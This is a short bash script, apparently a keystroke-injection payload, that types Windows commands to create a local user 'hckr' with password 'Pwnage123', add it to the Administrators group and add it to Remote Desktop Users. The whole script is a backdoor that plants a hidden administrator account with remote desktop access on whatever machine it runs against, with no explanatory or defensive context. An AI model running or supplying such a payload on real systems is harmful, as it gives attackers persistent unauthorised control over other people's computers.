#!/bin/bash

type_command "net user hckr Pwnage123 /add"
type_newline

type_command "net localgroup administrators hckr /add"
type_newline

type_command "net localgroup \"Remote Desktop Users\" hckr /add"
type_newline
